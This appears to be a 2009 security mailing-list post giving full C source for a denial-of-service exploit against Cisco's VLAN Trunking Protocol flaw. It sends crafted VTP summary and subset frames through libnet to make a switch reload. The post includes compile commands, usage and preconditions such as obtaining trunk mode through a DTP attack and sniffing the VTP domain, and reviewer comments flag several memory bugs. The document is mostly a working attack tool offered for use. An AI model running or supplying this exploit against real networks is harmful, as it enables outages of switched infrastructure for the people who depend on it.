DoS code for Cisco VLAN Trunking Protocol Vulnerability Jan 14 2009 05:07AM
showrun lee gmail com
/*DoS code for Cisco VLAN Trunking Protocol Vulnerability

*

*vulnerability description:

*http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml

*

*To know:

* 1.the switch must be in Server/Client mode.

* 2.the port the attacker is connected to must be in trunk mode.

* Cisco Ethernet ports with no configuration are not

* in trunk.but trunk mode can be obtained through DTP

* attack by Yersinia.

* 3.you must know the VTP domain; this can be sniffed

* 4.some codes are from Yersinia.

*

*Result:

* switch reload.

*

*

*Compile:

* gcc -o vtp `libnet-config --libs` vtp.c

*

*Usage:vtp -i <interface> -d <vtp_domain>

*

*Contact: showrun.lee[AT]gmail.com

*http://sh0wrun.blogspot.com/

*/

#include <libnet.h>

#include <stdio.h>

#include <stdlib.h>

#define VTP_DOMAIN_SIZE 32

#define VTP_TIMESTAMP_SIZE 12

/*
 * In-memory image of the VTP "summary" message as this tool emits it.
 *
 * main() overlays this struct directly on a calloc'd byte buffer (at a
 * 5-byte offset, after cisco_data), so the field order below IS the
 * wire layout.  All fields are naturally aligned (36 bytes of u_int8_t
 * precede the first u_int32_t), so no compiler padding is expected, but
 * there is no packing attribute or _Static_assert enforcing that.
 */
struct vtp_summary {
u_int8_t version;                   /* set to 0x01 by main() */
u_int8_t code;                      /* set to 0x01 by main() (summary) */
u_int8_t followers;                 /* set to 0x01 by main() */
u_int8_t dom_len;                   /* strlen(domain), truncated to 8 bits; not bounded by VTP_DOMAIN_SIZE */
u_int8_t domain[VTP_DOMAIN_SIZE];   /* domain bytes copied with memcpy; remainder left zero by calloc */
u_int32_t revision;                 /* stored in network byte order (htonl) by main() */
u_int32_t updater;                  /* never written; stays 0 from calloc */
u_int8_t timestamp[VTP_TIMESTAMP_SIZE]; /* never written; stays 0 from calloc */
u_int8_t md5[16];                   /* never written; stays 0 from calloc — no digest is computed */
};

/*
 * In-memory image of the VTP "subset" message as this tool emits it.
 *
 * Overlaid on a calloc'd buffer the same way as struct vtp_summary, so
 * field order is the wire layout.  Fields are naturally aligned (36
 * bytes of u_int8_t before the u_int32_t), so no padding is expected,
 * but nothing enforces that.
 */
struct vtp_subset {
u_int8_t version;                   /* set to 0x01 by main() */
u_int8_t code;                      /* set to 0x02 by main() (subset) */
u_int8_t seq;                       /* set to 0x01 by main() */
u_int8_t dom_len;                   /* strlen(domain), truncated to 8 bits; not bounded by VTP_DOMAIN_SIZE */
u_int8_t domain[VTP_DOMAIN_SIZE];   /* domain bytes copied with memcpy; remainder left zero by calloc */
u_int32_t revision;                 /* stored in network byte order (htonl) by main() */
};

/*
 * Print the command-line synopsis and terminate the process.
 *
 * s: program name (argv[0]), printed as the first word of the synopsis.
 * Does not return: exits with status 1.
 */
void usage( char *s) {
	const char *synopsis = "%s -i <interface> -d <vtp domain>\n";
	fprintf(stdout, synopsis, s);
	exit(1);
}

/*
 * Entry point: parse -i/-d, open a libnet link-layer handle on the
 * interface, then send two frames — a VTP summary and a VTP subset —
 * each carrying the given domain name and revision 2000.
 *
 * Returns -1 when libnet_init or either libnet_write fails; otherwise
 * control falls off the end (an implicit 0 for main under C99).
 *
 * Review notes (code left as-is):
 *  - -d is never validated, so `domain` is an uninitialized pointer
 *    when -d is omitted; only -i is checked via k.
 *  - both malloc() calls size strlen(optarg) without the terminator
 *    that strcpy() writes, and neither result is checked.
 *  - calloc() and libnet_build_* results are not checked.
 *  - the domain length is not bounded to VTP_DOMAIN_SIZE before the
 *    memcpy into the fixed-size domain[] field.
 *  - the struct pointers are formed at a 5-byte offset into a byte
 *    buffer, which is not guaranteed aligned for the u_int32_t members.
 *  - vtp_packet2 is never freed and libnet_destroy() is never called.
 */
int main( int argc, char *argv[] )
{
int opt,k=0;                 /* k becomes 1 once -i has been seen */
extern char *optarg;
libnet_ptag_t t;             /* libnet_build_* result; assigned but never checked */
libnet_t *lhandler;
u_int32_t vtp_len=0, sent;   /* sent is unsigned but compared against -1 below */
struct vtp_summary *vtp_summ;
struct vtp_subset *vtp_sub;
u_int8_t *vtp_packet,*vtp_packet2, *aux;
/* bytes placed ahead of the VTP header inside the 802.2 payload;
 * presumably the SNAP OUI + protocol id — not verified here */
u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
/* destination MAC used for both frames */
u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };
/* unused: only referenced by the commented-out memcpy further down */
u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00,0x00,0x00 };
struct libnet_ether_addr *mymac;
char *device;                /* assigned only under -i; guarded by k below */
char error_information[LIBNET_ERRBUF_SIZE];
char *domain;                /* assigned only under -d; NOT guarded — read uninitialized if -d is omitted */
// get options
while ((opt = getopt(argc, argv, "i:d:")) != -1)
{
switch (opt) {
case 'i':
/* one byte short: strcpy also writes the terminating NUL; result unchecked */
device=malloc(strlen(optarg));
strcpy(device,optarg);
k=1;
break;
case 'd':
/* same one-byte-short allocation and unchecked result as above */
domain=malloc(strlen(optarg));
strcpy(domain,optarg);
break;
default: usage(argv[0]);
}
}
/* only the interface is mandatory here; the domain is not checked */
if(!k) { printf(" %s -i <interface> -d <vtp domain>\n must assign the interface\n",argv[0]);exit(1);}
//init libnet
lhandler=libnet_init(LIBNET_LINK,device,error_information);
if (!lhandler) {
fprintf(stderr, "libnet_init: %s\n", error_information);
return -1;
}
/* source MAC of the chosen interface; result not checked for NULL */
mymac=libnet_get_hwaddr(lhandler);
//build the first packet for vtp_summary
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
vtp_packet = calloc(1,vtp_len);      /* result unchecked; zero-fill leaves unset fields at 0 */
aux = vtp_packet;
memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
aux+=sizeof(cisco_data);
/* struct overlaid at offset 5 into the buffer — alignment of the
 * u_int32_t members is not guaranteed on strict-alignment targets */
vtp_summ = (struct vtp_summary *)aux;
vtp_summ->version = 0x01;
vtp_summ->code = 0x01;//vtp_summary
vtp_summ->followers = 0x01;
/* dom_len is 8 bits and domain[] is VTP_DOMAIN_SIZE bytes; neither
 * limit is enforced on strlen(domain) before the copy below */
vtp_summ->dom_len = strlen(domain);
memcpy(vtp_summ->domain,domain,strlen(domain));
vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok
/* 802.2 LLC header wrapping the VTP payload; DSAP/SSAP 0xaa, control 0x03 */
t = libnet_build_802_2(
0xaa, /* DSAP */
0xaa, /* SSAP */
0x03, /* control */
vtp_packet, /* payload */
vtp_len, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
/* 802.3 header; length field covers the LLC header plus the VTP payload */
t = libnet_build_802_3(
dst_mac, /* ethernet destination */
mymac->ether_addr_octet, /* ethernet source */
LIBNET_802_2_H + vtp_len, /* frame size */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
sent = libnet_write(lhandler);
if (sent == -1) {              /* unsigned vs -1: relies on implicit conversion */
libnet_clear_packet(lhandler);
free(vtp_packet);
return -1;
}
libnet_clear_packet(lhandler);
//build the second vtp packet for vtp_subset
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);
vtp_packet2 = calloc(1,vtp_len);     /* result unchecked; never freed on any path */
aux = vtp_packet2;
memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));
aux+=sizeof(cisco_data);
/* same offset-5 overlay and alignment caveat as for vtp_summ */
vtp_sub = (struct vtp_subset *)aux;
vtp_sub->version = 0x01;
vtp_sub->code = 0x02; //vtp_subset
vtp_sub->seq = 0x01;
/* same unbounded domain length as above */
vtp_sub->dom_len = strlen(domain);
memcpy(vtp_sub->domain,domain,strlen(domain));
vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok
// memcpy(vtp_sub->aaa,aaa,strlen(aaa));   /* dead code: struct vtp_subset has no aaa member */
t = libnet_build_802_2(
0xaa, /* DSAP */
0xaa, /* SSAP */
0x03, /* control */
vtp_packet2, /* payload */
vtp_len, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
t = libnet_build_802_3(
dst_mac, /* ethernet destination */
mymac->ether_addr_octet, /* ethernet source */
LIBNET_802_2_H + vtp_len, /* frame size */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
sent = libnet_write(lhandler);
if (sent == -1) {
libnet_clear_packet(lhandler);
free(vtp_packet);              /* frees the first buffer only; vtp_packet2 leaks */
return -1;
}
libnet_clear_packet(lhandler);
/* no return statement: C99 gives main an implicit 0 here;
 * vtp_packet, vtp_packet2 and the libnet handle are not released */
}
